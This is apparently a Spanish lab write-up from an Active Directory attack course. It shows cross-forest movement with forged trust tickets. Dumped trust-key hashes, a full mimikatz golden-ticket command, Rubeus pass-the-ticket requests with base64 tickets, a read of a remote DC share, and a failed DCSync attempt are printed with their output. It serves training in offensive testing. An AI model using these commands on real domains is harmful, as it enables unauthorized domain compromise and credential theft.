Learning Objective - 20

Across Forest using Trust Tickets

Requerimos el hash de la confianza entre forest.

SMB         172.16.2.1      445    DCORP-DC         mcorp$:1103:aad3b435b51404eeaad3b435b51404ee:f5b5c9f1ca76187393db1d3bb8ded94e:::
SMB         172.16.2.1      445    DCORP-DC         US$:1104:aad3b435b51404eeaad3b435b51404ee:f85385d81cc4936d37ff8f27813f43c6:::
SMB         172.16.2.1      445    DCORP-DC         ecorp$:1112:aad3b435b51404eeaad3b435b51404ee:4501e4c7f30e1cb3c9886f06a3ed1c6a:::

Creando un TGT entre forest.

C:\AD\Tools>mimikatz.exe "kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /rc4:4501e4c7f30e1cb3c9886f06a3ed1c6a /service:krbtgt /target:eurocorp.local /ticket:trust_forest_tkt.kirbi" "exit"

  .#####.   mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( [email protected] )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /rc4:4501e4c7f30e1cb3c9886f06a3ed1c6a /service:krbtgt /target:eurocorp.local /ticket:trust_forest_tkt.kirbi
User      : Administrator
Domain    : dollarcorp.moneycorp.local (DOLLARCORP)
SID       : S-1-5-21-719815819-3726368948-3917688648
User Id   : 500
Groups Id : *513 512 520 518 519
ServiceKey: 4501e4c7f30e1cb3c9886f06a3ed1c6a - rc4_hmac_nt
Service   : krbtgt
Target    : eurocorp.local
Lifetime  : 3/4/2024 2:30:48 AM ; 3/2/2034 2:30:48 AM ; 3/2/2034 2:30:48 AM
-> Ticket : trust_forest_tkt.kirbi

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Final Ticket Saved to file !

mimikatz(commandline) # exit
Bye!

Luego cargamos el ticket usando rubeus.

C:\AD\Tools>Rubeus.exe asktgs /ticket:trust_forest_tkt.kirbi /service:cifs/eurocorp-dc.eurocorp.local /dc:eurocorp-dc.eurocorp.local /ptt

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.1

[*] Action: Ask TGS

[*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket
[*] Building TGS-REQ request for: 'cifs/eurocorp-dc.eurocorp.local'
[*] Using domain controller: eurocorp-dc.eurocorp.local (172.16.15.1)
[+] TGS request successful!
[+] Ticket successfully imported!
[*] base64(ticket.kirbi):

      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

  ServiceName              :  cifs/eurocorp-dc.eurocorp.local
  ServiceRealm             :  EUROCORP.LOCAL
  UserName                 :  Administrator
  UserRealm                :  dollarcorp.moneycorp.local
  StartTime                :  3/4/2024 2:30:59 AM
  EndTime                  :  3/4/2024 12:30:59 PM
  RenewTill                :  3/11/2024 3:30:59 AM
  Flags                    :  name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable
  KeyType                  :  aes256_cts_hmac_sha1
  Base64(key)              :  oNlPdIgC24awtz+BVQX1wzqgdfUXi1Klpo/4OUzvhd8=

Ahora podemos consultar al dc de eurocorp leer los archivos y obtener el contenido de secret.txt

C:\AD\Tools>dir \\eurocorp-dc.eurocorp.local\SharedwithDCorp\
 Volume in drive \\eurocorp-dc.eurocorp.local\SharedwithDCorp has no label.
 Volume Serial Number is 1A5A-FDE2

 Directory of \\eurocorp-dc.eurocorp.local\SharedwithDCorp

11/16/2022  04:26 AM    <DIR>          .
11/15/2022  06:17 AM                29 secret.txt
               1 File(s)             29 bytes
               1 Dir(s)  12,755,787,776 bytes free

C:\AD\Tools>type \\eurocorp-dc.eurocorp.local\SharedwithDCorp\secret.txt
Dollarcorp DAs can read this!
C:\AD\Tools>

DCSync

Si quisieramos hacer DCSync, probamos con el protocolo LDAP al cargar el ticket.

C:\AD\Tools>Rubeus.exe asktgs /ticket:trust_forest_tkt.kirbi /service:ldap/eurocorp-dc.eurocorp.local /dc:eurocorp-dc.eurocorp.local /ptt

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.1

[*] Action: Ask TGS

[*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket
[*] Building TGS-REQ request for: 'ldap/eurocorp-dc.eurocorp.local'
[*] Using domain controller: eurocorp-dc.eurocorp.local (172.16.15.1)
[+] TGS request successful!
[+] Ticket successfully imported!
[*] base64(ticket.kirbi):

      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

  ServiceName              :  ldap/eurocorp-dc.eurocorp.local
  ServiceRealm             :  EUROCORP.LOCAL
  UserName                 :  Administrator
  UserRealm                :  dollarcorp.moneycorp.local
  StartTime                :  3/4/2024 2:37:28 AM
  EndTime                  :  3/4/2024 12:37:28 PM
  RenewTill                :  3/11/2024 3:37:28 AM
  Flags                    :  name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable
  KeyType                  :  aes256_cts_hmac_sha1
  Base64(key)              :  7RXIWkPHMll2zs93v/FSfJsl/n7fGHeTVb81dL8iEy8=

No funciona y no se porque exactamente, debe estar limitado a ciertas consultas.

C:\AD\Tools>mimikatz.exe "lsadump::dcsync /user:ecorp\Administrator /domain:eurocorp.local" "exit"

  .#####.   mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( [email protected] )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # lsadump::dcsync /user:ecorp\Administrator /domain:eurocorp.local
[DC] 'eurocorp.local' will be the domain
[DC] 'eurocorp-dc.eurocorp.local' will be the DC server
[DC] 'ecorp\Administrator' will be the user account
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
ERROR kuhl_m_lsadump_dcsync ; GetNCChanges: 0x000020f7 (8439)

mimikatz(commandline) # exit
Bye!

C:\AD\Tools>

PreviousLearning Objective - 19 NextLearning Objective - 21

Last updated 1 year ago